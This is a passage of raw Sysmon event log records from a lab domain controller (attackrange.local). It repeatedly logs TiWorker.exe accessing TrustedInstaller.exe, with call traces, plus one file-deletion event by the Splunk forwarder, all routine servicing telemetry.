T4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006165Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.212{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006164Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.212{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006163Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.212{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006162Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.197{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006161Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.181{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006160Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.181{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006159Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.166{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006158Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.166{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006157Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.166{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006156Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.166{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006155Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.150{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006154Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.150{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 23542300x80000000000000006153Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.150{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9B46EAD4CC3FAD06FCE91E6B9A8A55B,SHA256=9D304D25B3DB21964F3D01E86E4AEEB2C0B3C1871A20DBF567BA39DBBDD8F277,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006152Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.150{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006151Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.134{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006150Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.134{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006149Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.134{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006148Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.134{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006147Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 